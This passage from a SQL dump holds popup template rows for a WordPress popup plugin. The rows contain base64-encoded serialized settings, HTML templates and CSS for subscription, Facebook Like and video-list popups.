hdWx0IjtzOjE3OiJ0ZXh0X2ZvbnRfY29sb3JfMCI7czo3OiIjMDAwMDAwIjtzOjEwOiJmb250X3R4dF8xIjtzOjc6ImRlZmF1bHQiO3M6MTc6InRleHRfZm9udF9jb2xvcl8xIjtzOjc6IiMwMDAwMDAiO3M6MTE6ImZvbnRfZm9vdGVyIjtzOjc6ImRlZmF1bHQiO3M6MTc6ImZvb3Rlcl9mb250X2NvbG9yIjtzOjc6IiM5Nzk2OTYiO3M6OToiY2xvc2VfYnRuIjtzOjExOiJsaXN0c19ibGFjayI7czo3OiJidWxsZXRzIjtzOjExOiJsaXN0c19ncmVlbiI7czoxMzoiZW5iX3N1YnNjcmliZSI7czoxOiIxIjtzOjg6InN1Yl9kZXN0IjtzOjk6IndvcmRwcmVzcyI7czoyMzoic3ViX3dwX2NyZWF0ZV91c2VyX3JvbGUiO3M6MTA6InN1YnNjcmliZXIiO3M6MTk6InN1Yl9hd2ViZXJfbGlzdG5hbWUiO3M6MDoiIjtzOjIxOiJzdWJfYXdlYmVyX2FkdHJhY2tpbmciO3M6MDoiIjtzOjIxOiJzdWJfbWFpbGNoaW1wX2FwaV9rZXkiO3M6MDoiIjtzOjE0OiJzdWJfZ3JfYXBpX2tleSI7czowOiIiO3M6MTQ6InN1Yl9hY19hcGlfdXJsIjtzOjA6IiI7czoxNDoic3ViX2FjX2FwaV9rZXkiO3M6MDoiIjtzOjE4OiJzdWJfYXJfZm9ybV9hY3Rpb24iO3M6MDoiIjtzOjEwOiJzdWJfc2dhX2lkIjtzOjA6IiI7czoxNToic3ViX3NnYV9saXN0X2lkIjtzOjA6IiI7czoyMToic3ViX3NnYV9hY3RpdmF0ZV9jb2RlIjtzOjA6IiI7czoxMDoic3ViX2ZpZWxkcyI7YToyOntzOjU6ImVtYWlsIjthOjc6e3M6NDoibmFtZSI7czo1OiJlbWFpbCI7czo0OiJodG1sIjtzOjQ6InRleHQiO3M6NToibGFiZWwiO3M6NjoiRS1NYWlsIjtzOjU6InZhbHVlIjtzOjA6IiI7czo2OiJjdXN0b20iO3M6MToiMCI7czo5OiJtYW5kYXRvcnkiO3M6MToiMSI7czozOiJlbmIiO3M6MToiMSI7fXM6NDoibmFtZSI7YTo3OntzOjM6ImVuYiI7czoxOiIxIjtzOjQ6Im5hbWUiO3M6NDoibmFtZSI7czo0OiJodG1sIjtzOjQ6InRleHQiO3M6NToibGFiZWwiO3M6NDoiTmFtZSI7czo1OiJ2YWx1ZSI7czowOiIiO3M6NjoiY3VzdG9tIjtzOjE6IjAiO3M6OToibWFuZGF0b3J5IjtzOjE6IjAiO319czoyMDoic3ViX3R4dF9jb25maXJtX3NlbnQiO3M6Njc6IkNvbmZpcm1hdGlvbiBsaW5rIHdhcyBzZW50IHRvIHlvdXIgZW1haWwgYWRkcmVzcy4gQ2hlY2sgeW91ciBlbWFpbCEiO3M6MTU6InN1Yl90eHRfc3VjY2VzcyI7czoyNDoiVGhhbmsgeW91IGZvciBzdWJzY3JpYmUhIjtzOjIxOiJzdWJfdHh0X2ludmFsaWRfZW1haWwiO3M6MjI6IkVtcHR5IG9yIGludmFsaWQgZW1haWwiO3M6MTY6InN1Yl9yZWRpcmVjdF91cmwiO3M6MDoiIjtzOjI4OiJzdWJfdHh0X2NvbmZpcm1fbWFpbF9zdWJqZWN0IjtzOjM0OiJDb25maXJtIHN1YnNjcmlwdGlvbiBvbiBbc2l0ZW5hbWVdIjtzOjI1OiJzdWJfdHh0X2NvbmZpcm1fbWFpbF9mcm9tIjtzOjE0OiJhZG1pbkBtYWlsLmNvbSI7czoyODoic3ViX3R4dF9jb25maXJtX21haWxfbWVzc2FnZSI7czoxOTc6IllvdSBzdWJzY3JpYmVkIG9uIHNpdGUgPGEgaHJlZj1cIltzaXRldXJsXVwiPltzaXRlbmFtZV08L2E+LiBGb2xsb3cgPGEgaHJlZj1cIltjb25maXJtX2xpbmtdXCI+dGhpcyBsaW5rPC9hPiB0byBjb21wbGV0ZSB5b3VyIHN1YnNjcmlwdGlvbi4gSWYgeW91IGRpZCBub3Qgc3Vic2NyaWJlIGhlcmUgLSBqdXN0IGlnbm9yZSB0aGlzIG1lc3NhZ2UuIjtzOjMxOiJzdWJfdHh0X3N1YnNjcmliZXJfbWFpbF9zdWJqZWN0IjtzOjM3OiJbc2l0ZW5hbWVdIFlvdXIgdXNlcm5hbWUgYW5kIHBhc3N3b3JkIjtzOjI4OiJzdWJfdHh0X3N1YnNjcmliZXJfbWFpbF9mcm9tIjtzOjE0OiJhZG1pbkBtYWlsLmNvbSI7czozMToic3ViX3R4dF9zdWJzY3JpYmVyX21haWxfbWVzc2FnZSI7czo2NToiVXNlcm5hbWU6IFt1c2VyX2xvZ2luXTxiciAvPlBhc3N3b3JkOiBbcGFzc3dvcmRdPGJyIC8+W2xvZ2luX3VybF0iO3M6MjU6InN1Yl9yZWRpcmVjdF9lbWFpbF9leGlzdHMiO3M6MDoiIjtzOjEzOiJzdWJfYnRuX2xhYmVsIjtzOjU6IkpvaW4hIjtzOjE1OiJlbmJfc21fZmFjZWJvb2siO3M6MToiMSI7czoxNzoiZW5iX3NtX2dvb2dsZXBsdXMiO3M6MToiMSI7czoxNDoiZW5iX3NtX3R3aXR0ZXIiO3M6MToiMSI7czo5OiJzbV9kZXNpZ24iO3M6Njoic2ltcGxlIjtzOjg6ImFuaW1fa2V5IjtzOjQ6Im5vbmUiO3M6MTM6ImFuaW1fZHVyYXRpb24iO3M6MDoiIjtzOjExOiJsYXllcmVkX3BvcyI7czozOiJ0b3AiO3M6OToiZW5iX2xhYmVsIjtzOjE6IjEiO3M6NToibGFiZWwiO3M6NTU6IkluY3JlYXNlIHN1YnNjcmliZXJzLCBzb2NpYWwgZm9sbG93ZXJzIG9yIGFkdmVydGlzZW1lbnQiO3M6OToiZW5iX3R4dF8wIjtzOjE6IjEiO3M6OToiZW5iX3R4dF8xIjtzOjE6IjEiO3M6MTM6ImVuYl9mb290X25vdGUiO3M6MToiMSI7czo5OiJmb290X25vdGUiO3M6MTE3OiJXZSByZXNwZWN0IHlvdXIgcHJpdmFjeS4gWW91ciBpbmZvcm1hdGlvbiB3aWxsIG5vdCBiZSBzaGFyZWQgd2l0aCBhbnkgdGhpcmQgcGFydHkgYW5kIHlvdSBjYW4gdW5zdWJzY3JpYmUgYXQgYW55IHRpbWUiO3M6NToidHh0XzAiO3M6NDQ6IjxwPlRoZSBCZXN0IFdvcmRQcmVzcyBQb3BVcCBvcHRpbiBwbHVnaW48L3A+IjtzOjU6InR4dF8xIjtzOjMxMzoiPHA+UG9wdXAgYnkgU3Vwc3lzdGljIGxldHMgeW91IGVhc2lseSBjcmVhdGUgZWxlZ2FudCBvdmVybGFwcGluZyB3aW5kb3dzIHdpdGggdW5saW1pdGVkIGZlYXR1cmVzLiBQb3AtdXBzIHdpdGggU2xpZGVyLCBMaWdodGJveCwgQ29udGFjdCBhbmQgU3Vic2NyaXB0aW9uIGZvcm1zIGFuZCBtb3JlOjwvcD48dWw+PGxpPlVubGltaXRlZCBDb250ZW50IEN1c3RvbWl6YXRpb248L2xpPjxsaT5BdXRvIE9wZW4gUG9wdXBzPC9saT48bGk+Q29udGFjdCBGb3JtIHdpdGggcG9wLXVwPC9saT48bGk+UG9wdXAgT3BlbmluZyBBbmltYXRpb25zPC9saT48L3VsPiI7fXM6MTA6Im9wdHNfYXR0cnMiO2E6Mjp7czo5OiJiZ19udW1iZXIiO3M6MToiMyI7czoxNjoidHh0X2Jsb2NrX251bWJlciI7czoxOiIyIjt9fQ==','<div id=\"ppsPopupShell_[ID]\" class=\"ppsPopupShell ppsPopupListsShell\">\r\n	<a href=\"#\" class=\"ppsPopupClose\"></a>\r\n  	<div class=\"ppsPopupListsInner\">\r\n  		[if enb_txt_0]\r\n  		<div class=\"ppsPopupTxt ppsPopupTxt_0\">\r\n          <div class=\"ppsTxtContent\">[txt_0]</div>\r\n      	</div>\r\n  		[endif]\r\n      	<div class=\"ppsPopupTblCols\">\r\n          <div class=\"ppsPopupLeftCol\">\r\n            [if enb_label]\r\n            <div class=\"ppsPopupLabel\">[label]</div>\r\n            [endif]\r\n            [if enb_txt_1]\r\n            <div class=\"ppsPopupTxt ppsPopupTxt_1\">[txt_1]</div>\r\n            [endif]\r\n          </div>\r\n          <div class=\"ppsPopupRightCol\">\r\n            [if enb_subscribe]\r\n            <div class=\"ppsSubscribeShell\">\r\n              <div class=\"ppsBigArrow\"></div>\r\n              [sub_form_start]\r\n              [sub_fields_html]\r\n              <input type=\"submit\" name=\"submit\" value=\"[sub_btn_label]\" />\r\n              [sub_form_end]\r\n            </div>\r\n            [endif]\r\n            [if enb_sm]\r\n            <div class=\"ppsSm\">\r\n              [sm_html]\r\n            </div>\r\n            [endif]\r\n            [if enb_foot_note]\r\n            <div class=\"ppsFootNote\">\r\n              [foot_note]\r\n            </div>\r\n            [endif]\r\n          </div>\r\n      	</div>\r\n  	</div>\r\n  	\r\n</div>','#ppsPopupShell_[ID] {\r\n	width: [width][width_measure];\r\n  	font-family: Helvetica,Arial,sans-serif;\r\n  	font-size: 14px;\r\n  \r\n  	[if bg_type_0 == \'img\']\r\n  	background-image: url(\"[bg_img_0]\");\r\n  	background-repeat: no-repeat;\r\n  	background-size: cover;\r\n  	[endif]\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupLabel {\r\n	color: #414141;\r\n    font-size: 28px;\r\n    font-style: normal;\r\n    font-weight: bold;\r\n    letter-spacing: -1px;\r\n    line-height: 35px;\r\n    text-shadow: 0 1px 1px #000;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupListsInner {\r\n  	[if bg_type_0 == \'color\']\r\n    background: {{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }}; /* Old browsers */\r\n    background: -moz-radial-gradient(center, ellipse cover, {{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }} 0%, [bg_color_0] 100%); /* FF3.6+ */\r\n    background: -webkit-gradient(radial, center center, 0px, center center, 100%, color-stop(0%,{{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }}), color-stop(100%,[bg_color_0])); /* Chrome,Safari4+ */\r\n    background: -webkit-radial-gradient(center, ellipse cover, {{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }} 0%,[bg_color_0] 100%); /* Chrome10+,Safari5.1+ */\r\n    background: -o-radial-gradient(center, ellipse cover, {{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }} 0%,[bg_color_0] 100%); /* Opera 12+ */\r\n    background: -ms-radial-gradient(center, ellipse cover, {{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }} 0%,[bg_color_0] 100%); /* IE10+ */\r\n    background: radial-gradient(ellipse at center, {{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }} 0%,[bg_color_0] 100%); /* W3C */\r\n    filter: progid:DXImageTransform.Microsoft.gradient( startColorstr=\'{{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }}\', endColorstr=\'#eaeaea\',GradientType=1 ); /* IE6-9 fallback on horizontal gradient */\r\n  	[endif]\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupTxt_0 {\r\n	width: 100%;\r\n  	border-bottom: 1px solid {{ adjust_brightness(popup.params.tpl.bg_color_0, -50) }};\r\n  	clear: both;\r\n  	font-size: 13px;\r\n    font-weight: bold;\r\n  	font-family: Helvetica,Arial,sans-serif;\r\n  	[if bg_type_0 == \'color\']\r\n  	background: [bg_color_0]; /* Old browsers */\r\n    background: -moz-linear-gradient(top, [bg_color_0] 0%, {{ adjust_brightness(popup.params.tpl.bg_color_0, 20) }} 100%); /* FF3.6+ */\r\n    background: -webkit-gradient(linear, left top, left bottom, color-stop(0%,[bg_color_0]), color-stop(100%,{{ adjust_brightness(popup.params.tpl.bg_color_0, 20) }})); /* Chrome,Safari4+ */\r\n    background: -webkit-linear-gradient(top, [bg_color_0] 0%,{{ adjust_brightness(popup.params.tpl.bg_color_0, 20) }} 100%); /* Chrome10+,Safari5.1+ */\r\n    background: -o-linear-gradient(top, [bg_color_0] 0%,{{ adjust_brightness(popup.params.tpl.bg_color_0, 20) }} 100%); /* Opera 11.10+ */\r\n    background: -ms-linear-gradient(top, [bg_color_0] 0%,{{ adjust_brightness(popup.params.tpl.bg_color_0, 20) }} 100%); /* IE10+ */\r\n    background: linear-gradient(to bottom, [bg_color_0] 0%,{{ adjust_brightness(popup.params.tpl.bg_color_0, 20) }} 100%); /* W3C */\r\n    filter: progid:DXImageTransform.Microsoft.gradient( startColorstr=\'[bg_color_0]\', endColorstr=\'{{ adjust_brightness(popup.params.tpl.bg_color_0, 20) }}\',GradientType=0 ); /* IE6-9 */\r\n  	[endif]\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupTxt_0 .ppsTxtContent {\r\n	padding: 10px 10px 10px 50px;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupTblCols {\r\n	display: table;\r\n  	padding: 10px 10px 10px 50px;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupLeftCol {\r\n	display: table-cell;\r\n  	vertical-align: top;\r\n  	[if enb_subscribe]\r\n  	width: 64%;\r\n  	[else]\r\n  	width: 100%;\r\n  	[endif]\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupRightCol {\r\n  	width: 36%;\r\n	display: table-cell;\r\n  	position: relative;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell form {\r\n	padding: 30px 30px 0;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input,\r\n#ppsPopupShell_[ID] .ppsSubscribeShell .ppsSubSelect,\r\n#ppsPopupShell_[ID] .ppsSubscribeShell textarea {\r\n	width: 100%;\r\n  	margin-bottom: 10px;\r\n  	height: 40px;\r\n  	border: 1px solid #000;\r\n  	border-radius: 10px;\r\n  	display: block;\r\n  	background-color: #fff;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input[type=text],#ppsPopupShell_[ID] .ppsSubscribeShell input[type=email],#ppsPopupShell_[ID] .ppsSubscribeShell input[type=password],#ppsPopupShell_[ID] .ppsSubscribeShell input[type=email],\r\n#ppsPopupShell_[ID] .ppsSubscribeShell .ppsSubSelect,\r\n#ppsPopupShell_[ID] .ppsSubscribeShell textarea {\r\n	box-shadow: 2px 2px 2px #dcdcdc inset;\r\n  	padding-left: 10px;\r\n  	font-size: 17px;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell .ppsSubSelect {\r\n	display: table;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell .ppsSubSelectLabel,\r\n#ppsPopupShell_[ID] .ppsSubscribeShell select {\r\n	display: table-cell;\r\n  	vertical-align: middle;\r\n  	height: 40px;\r\n  	background-color: transparent;\r\n  	border: none;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell select {\r\n	width: 100%;\r\n  	margin-left: -10px;\r\n  	font-size: 17px;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell .ppsSubSelectLabel {\r\n	opacity: 0.5;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell textarea {\r\n	height: auto;\r\n  	font-family: inherit;\r\n  	padding-top: 5px;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input[type=text],#ppsPopupShell_[ID] .ppsSubscribeShell input[type=email],#ppsPopupShell_[ID] .ppsSubscribeShell input[name=\"email\"] {\r\n	background-image: url(\"[PPS_ASSETS_URL]img/assets/mail-icon.png\");\r\n  	background-repeat: no-repeat;\r\n  	background-position: 90% center;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input[type=submit] {\r\n	border: none;\r\n  	[if bg_type_1 == \'color\']\r\n  	background: [bg_color_1];\r\n    background: -moz-linear-gradient(90deg, [bg_color_1] 0%, {{ adjust_brightness(popup.params.tpl.bg_color_1, 100) }} 63%);\r\n    background: -webkit-linear-gradient(270deg, [bg_color_1] 0%, {{ adjust_brightness(popup.params.tpl.bg_color_1, 100) }} 63%);\r\n    background: -o-linear-gradient(270deg, [bg_color_1] 0%, {{ adjust_brightness(popup.params.tpl.bg_color_1, 100) }} 63%);\r\n    background: -ms-linear-gradient(270deg, [bg_color_1] 0%, {{ adjust_brightness(popup.params.tpl.bg_color_1, 100) }} 63%);\r\n    background: linear-gradient(0deg, [bg_color_1]) 0%, {{ adjust_brightness(popup.params.tpl.bg_color_1, 100) }} 63%);\r\n  	[elseif bg_type_1 == \'img\']\r\n  	background-image: url(\"[bg_img_1]\");\r\n  	background-repeat: no-repeat;\r\n  	background-size: cover;\r\n  	[endif]\r\n  \r\n  	color: #000;\r\n    font-size: 20px;\r\n    text-shadow: 2px 2px 2px #000;\r\n  	cursor: pointer;\r\n  	max-width: 230px;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input[type=submit]:hover {\r\n	box-shadow: inset 1px 1px 3px #666;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupClose:hover {\r\n	opacity: 0.8;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupClose {\r\n	background-repeat: no-repeat;\r\n  	cursor: pointer;\r\n}\r\n#ppsPopupShell_[ID] .ppsFootNote {\r\n    color: #979696;\r\n    font-family: \"Helvetica Neue\",Helvetica,Arial,sans-serif;\r\n    font-size: xx-small;\r\n    font-style: italic;\r\n    line-height: 14px;\r\n    text-align: left;\r\n  	margin-left: 30px;\r\n}\r\n#ppsPopupShell_[ID] .ppsBigArrow {\r\n	[if bg_type_2 == \'img\']\r\n  	position: absolute;\r\n  	width: 102px;\r\n    height: 81px;\r\n  	background-image: url(\"[bg_img_2]\");\r\n  	background-repeat: no-repeat;\r\n  	top: -20px;\r\n  	right: 20px;\r\n  	z-index: 100;\r\n  	[else]\r\n  	display: none;\r\n  	[endif]\r\n}\r\n#ppsPopupShell_[ID] .ppsSuccessMsg {\r\n	padding: 55px 5px 5px;\r\n}','',1,1,1,1,0,0,0,'2015-01-13 18:22:48',13,0),(4,'Facebook Like',1,0,'YTozOntzOjQ6Im1haW4iO2E6MzA6e3M6Nzoic2hvd19vbiI7czo5OiJwYWdlX2xvYWQiO3M6MjM6InNob3dfb25fcGFnZV9sb2FkX2RlbGF5IjtzOjA6IiI7czoyNToic2hvd19vbl9jbGlja19vbl9lbF9kZWxheSI7czoxOiIwIjtzOjI3OiJzaG93X29uX3Njcm9sbF93aW5kb3dfZGVsYXkiO3M6MToiMCI7czozMzoic2hvd19vbl9zY3JvbGxfd2luZG93X3BlcmNfc2Nyb2xsIjtzOjE6IjAiO3M6Mjg6InNob3dfb25fYWZ0ZXJfaW5hY3RpdmVfdmFsdWUiO3M6MjoiMTAiO3M6MjU6InNob3dfb25fbGlua19mb2xsb3dfZGVsYXkiO3M6MToiMCI7czo4OiJjbG9zZV9vbiI7czoxMDoidXNlcl9jbG9zZSI7czoyNjoiY2xvc2Vfb25fYWZ0ZXJfYWN0aW9uX3RpbWUiO3M6MToiMSI7czoyNToiY2xvc2Vfb25fYWZ0ZXJfdGltZV92YWx1ZSI7czoxOiI1IjtzOjEwOiJzaG93X3BhZ2VzIjtzOjM6ImFsbCI7czoxNDoic2hvd190aW1lX2Zyb20iO3M6NzoiMTI6MDBhbSI7czoxMjoic2hvd190aW1lX3RvIjtzOjc6IjEyOjAwYW0iO3M6MTQ6InNob3dfZGF0ZV9mcm9tIjtzOjA6IiI7czoxMjoic2hvd19kYXRlX3RvIjtzOjA6IiI7czo3OiJzaG93X3RvIjtzOjg6ImV2ZXJ5b25lIjtzOjI5OiJzaG93X3RvX2ZpcnN0X3RpbWVfdmlzaXRfZGF5cyI7czoyOiIzMCI7czozMDoic2hvd190b191bnRpbF9tYWtlX2FjdGlvbl9kYXlzIjtzOjI6IjMwIjtzOjE1OiJjb3VudF90aW1lc19udW0iO3M6MToiMSI7czoxNToiY291bnRfdGltZXNfbWVzIjtzOjM6ImRheSI7czoyMToiaGlkZV9mb3JfZGV2aWNlc19zaG93IjtzOjE6IjAiO3M6MjQ6ImhpZGVfZm9yX3Bvc3RfdHlwZXNfc2hvdyI7czoxOiIwIjtzOjE3OiJoaWRlX2Zvcl9pcHNfc2hvdyI7czoxOiIwIjtzOjEyOiJoaWRlX2Zvcl9pcHMiO3M6MDoiIjtzOjIzOiJoaWRlX2Zvcl9jb3VudHJpZXNfc2hvdyI7czoxOiIwIjtzOjIzOiJoaWRlX2Zvcl9sYW5ndWFnZXNfc2hvdyI7czoxOiIwIjtzOjI0OiJoaWRlX3NlYXJjaF9lbmdpbmVzX3Nob3ciO3M6MToiMCI7czoxODoiaGlkZV9wcmVnX3VybF9zaG93IjtzOjE6IjAiO3M6MTM6ImhpZGVfcHJlZ191cmwiO3M6MDoiIjtzOjI0OiJoaWRlX2Zvcl91c2VyX3JvbGVzX3Nob3ciO3M6MToiMCI7fXM6MzoidHBsIjthOjIwOntzOjU6IndpZHRoIjtzOjM6IjMwMCI7czoxMzoid2lkdGhfbWVhc3VyZSI7czoyOiJweCI7czo2OiJoZWlnaHQiO3M6MDoiIjtzOjE0OiJoZWlnaHRfbWVhc3VyZSI7czoyOiJweCI7czoxMjoiZmJfbGlrZV9vcHRzIjthOjM6e3M6NDoiaHJlZiI7czo1NzoiaHR0cHM6Ly93d3cuZmFjZWJvb2suY29tL3BhZ2VzL1N1cHN5c3RpYy8xMzg5MzkwMTk4MDI4OTk5IjtzOjQ6InRhYnMiO2E6MTp7aTowO3M6ODoidGltZWxpbmUiO31zOjEzOiJzaG93X2ZhY2VwaWxlIjtzOjE6IjEiO31zOjE4OiJiZ19vdmVybGF5X29wYWNpdHkiO3M6MzoiMC41IjtzOjE1OiJiZ19vdmVybGF5X3R5cGUiO3M6NToiY29sb3IiO3M6MTY6ImJnX292ZXJsYXlfY29sb3IiO3M6NDoiIzAwMCI7czoxNDoiYmdfb3ZlcmxheV9pbWciO3M6MDoiIjtzOjE4OiJiZ19vdmVybGF5X2ltZ19wb3MiO3M6Nzoic3RyZXRjaCI7czo5OiJiZ190eXBlXzAiO3M6NToiY29sb3IiO3M6ODoiYmdfaW1nXzAiO3M6MDoiIjtzOjEwOiJiZ19jb2xvcl8wIjtzOjc6IiNmZmZmZmYiO3M6MTU6InJlc3BvbnNpdmVfbW9kZSI7czozOiJkZWYiO3M6MTc6InJlaWRyZWN0X29uX2Nsb3NlIjtzOjA6IiI7czo5OiJjbG9zZV9idG4iO3M6MTE6ImNsYXNzeV9ncmV5IjtzOjExOiJsYXllcmVkX3BvcyI7czozOiJ0b3AiO3M6ODoiYW5pbV9rZXkiO3M6NDoibm9uZSI7czoxMzoiYW5pbV9kdXJhdGlvbiI7czoxOiIxIjtzOjEyOiJzdGF0X2dhX2NvZGUiO3M6MDoiIjt9czoxMDoib3B0c19hdHRycyI7YToyOntzOjk6ImJnX251bWJlciI7czoxOiIxIjtzOjE2OiJ0eHRfYmxvY2tfbnVtYmVyIjtzOjE6IjAiO319','<div id=\"ppsPopupShell_[ID]\" class=\"ppsPopupShell ppsPopupFbLikeShell\">\r\n	<a href=\"#\" class=\"ppsPopupClose\"></a>\r\n  	[fb_like_widget_html]\r\n</div>','#ppsPopupShell_[ID] {\r\n	width: [width][width_measure];\r\n  	/*height: [height][height_measure];*/\r\n  	[if bg_type_0 == \'color\']\r\n  	background-color: [bg_color_0];\r\n  	[elseif bg_type_0 == \'img\']\r\n  	background-repeat: no_repeat;\r\n  	background-image: url(\"[bg_img_0]\");\r\n  	background-size: cover;\r\n  	[endif]\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupClose {\r\n	z-index: 99;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupClose:hover {\r\n	opacity: 0.8;\r\n}\r\n','',1,1,1,2,0,0,0,'2015-01-16 18:35:51',3,0),(5,'Video List',1,0,'YTozOntzOjQ6Im1haW4iO2E6Mjc6e3M6Nzoic2hvd19vbiI7czo5OiJwYWdlX2xvYWQiO3M6MjM6InNob3dfb25fcGFnZV9sb2FkX2RlbGF5IjtzOjA6IiI7czoyNToic2hvd19vbl9jbGlja19vbl9lbF9kZWxheSI7czoxOiIwIjtzOjI3OiJzaG93X29uX3Njcm9sbF93aW5kb3dfZGVsYXkiO3M6MToiMCI7czozMzoic2hvd19vbl9zY3JvbGxfd2luZG93X3BlcmNfc2Nyb2xsIjtzOjE6IjAiO3M6MjU6InNob3dfb25fbGlua19mb2xsb3dfZGVsYXkiO3M6MToiMCI7czo4OiJjbG9zZV9vbiI7czoxMDoidXNlcl9jbG9zZSI7czoxMDoic2hvd19wYWdlcyI7czozOiJhbGwiO3M6MTQ6InNob3dfdGltZV9mcm9tIjtzOjc6IjEyOjAwYW0iO3M6MTI6InNob3dfdGltZV90byI7czo3OiIxMjowMGFtIjtzOjE0OiJzaG93X2RhdGVfZnJvbSI7czowOiIiO3M6MTI6InNob3dfZGF0ZV90byI7czowOiIiO3M6Nzoic2hvd190byI7czo4OiJldmVyeW9uZSI7czoyOToic2hvd190b19maXJzdF90aW1lX3Zpc2l0X2RheXMiO3M6MjoiMzAiO3M6MzA6InNob3dfdG9fdW50aWxfbWFrZV9hY3Rpb25fZGF5cyI7czoyOiIzMCI7czoxNToiY291bnRfdGltZXNfbnVtIjtzOjE6IjEiO3M6MTU6ImNvdW50X3RpbWVzX21lcyI7czozOiJkYXkiO3M6MjE6ImhpZGVfZm9yX2RldmljZXNfc2hvdyI7czoxOiIwIjtzOjI0OiJoaWRlX2Zvcl9wb3N0X3R5cGVzX3Nob3ciO3M6MToiMCI7czoxNzoiaGlkZV9mb3JfaXBzX3Nob3ciO3M6MToiMCI7czoxMjoiaGlkZV9mb3JfaXBzIjtzOjA6IiI7czoyMzoiaGlkZV9mb3JfY291bnRyaWVzX3Nob3ciO3M6MToiMCI7czoyMzoiaGlkZV9mb3JfbGFuZ3VhZ2VzX3Nob3ciO3M6MToiMCI7czoyNDoiaGlkZV9zZWFyY2hfZW5naW5lc19zaG93IjtzOjE6IjAiO3M6MTg6ImhpZGVfcHJlZ191cmxfc2hvdyI7czoxOiIwIjtzOjEzOiJoaWRlX3ByZWdfdXJsIjtzOjA6IiI7czoyNDoiaGlkZV9mb3JfdXNlcl9yb2xlc19zaG93IjtzOjE6IjAiO31zOjM6InRwbCI7YTo2Mzp7czo5OiJ2aWRlb191cmwiO3M6NDM6Imh0dHBzOi8vd3d3LnlvdXR1YmUuY29tL3dhdGNoP3Y9bktJdTl5ZW41bmMiO3M6NToid2lkdGgiO3M6MzoiODI0IjtzOjEzOiJ3aWR0aF9tZWFzdXJlIjtzOjI6InB4IjtzOjY6ImhlaWdodCI7czozOiI0MDAiO3M6MTQ6ImhlaWdodF9tZWFzdXJlIjtzOjI6InB4IjtzOjE4OiJiZ19vdmVybGF5X29wYWNpdHkiO3M6MzoiMC41IjtzOjE1OiJiZ19vdmVybGF5X3R5cGUiO3M6NToiY29sb3IiO3M6MTY6ImJnX292ZXJsYXlfY29sb3IiO3M6NDoiIzAwMCI7czoxNDoiYmdfb3ZlcmxheV9pbWciO3M6MDoiIjtzOjE4OiJiZ19vdmVybGF5X2ltZ19wb3MiO3M6Nzoic3RyZXRjaCI7czo5OiJiZ190eXBlXzAiO3M6NDoibm9uZSI7czo4OiJiZ19pbWdfMCI7czowOiIiO3M6MTA6ImJnX2NvbG9yXzAiO3M6NzoiI2ZmZmZmZiI7czo5OiJiZ190eXBlXzEiO3M6NToiY29sb3IiO3M6ODoiYmdfaW1nXzEiO3M6MDoiIjtzOjEwOiJiZ19jb2xvcl8xIjtzOjc6IiMzYmQwZDAiO3M6OToiYmdfdHlwZV8yIjtzOjU6ImNvbG9yIjtzOjg6ImJnX2ltZ18yIjtzOjA6IiI7czoxMDoiYmdfY29sb3JfMiI7czo3OiIjMGU2ODY4IjtzOjEwOiJmb250X2xhYmVsIjtzOjc6ImRlZmF1bHQiO3M6MTY6ImxhYmVsX2ZvbnRfY29sb3IiO3M6NzoiIzAxNTA1MCI7czoxMToiZm9udF9mb290ZXIiO3M6NzoiZGVmYXVsdCI7czoxNzoiZm9vdGVyX2ZvbnRfY29sb3IiO3M6NzoiIzAxNTA1MCI7czoxNToicmVzcG9uc2l2ZV9tb2RlIjtzOjM6ImRlZiI7czoxNzoicmVpZHJlY3Rfb25fY2xvc2UiO3M6MDoiIjtzOjk6ImNsb3NlX2J0biI7czoxMToiY2xhc3N5X2dyZXkiO3M6MTE6ImxheWVyZWRfcG9zIjtzOjA6IiI7czo1OiJsYWJlbCI7czoyNjoiQ2hlY2sgdmlkZW8gYW5kIHN1YnNjcmliZSEiO3M6MTM6ImVuYl9mb290X25vdGUiO3M6MToiMSI7czo5OiJmb290X25vdGUiO3M6MTE4OiJXZSByZXNwZWN0IHlvdXIgcHJpdmFjeS4gWW91ciBpbmZvcm1hdGlvbiB3aWxsIG5vdCBiZSBzaGFyZWQgd2l0aCBhbnkgdGhpcmQgcGFydHkgYW5kIHlvdSBjYW4gdW5zdWJzY3JpYmUgYXQgYW55IHRpbWUgIjtzOjE1OiJlbmJfc21fZmFjZWJvb2siO3M6MToiMSI7czoxNzoiZW5iX3NtX2dvb2dsZXBsdXMiO3M6MToiMSI7czoxNDoiZW5iX3NtX3R3aXR0ZXIiO3M6MToiMSI7czo5OiJzbV9kZXNpZ24iO3M6Njoic2ltcGxlIjtzOjg6ImFuaW1fa2V5IjtzOjQ6Im5vbmUiO3M6MTM6ImFuaW1fZHVyYXRpb24iO3M6MDoiIjtzOjEzOiJlbmJfc3Vic2NyaWJlIjtzOjE6IjEiO3M6ODoic3ViX2Rlc3QiO3M6OToid29yZHByZXNzIjtzOjIzOiJzdWJfd3BfY3JlYXRlX3VzZXJfcm9sZSI7czoxMDoic3Vic2NyaWJlciI7czoxOToic3ViX2F3ZWJlcl9saXN0bmFtZSI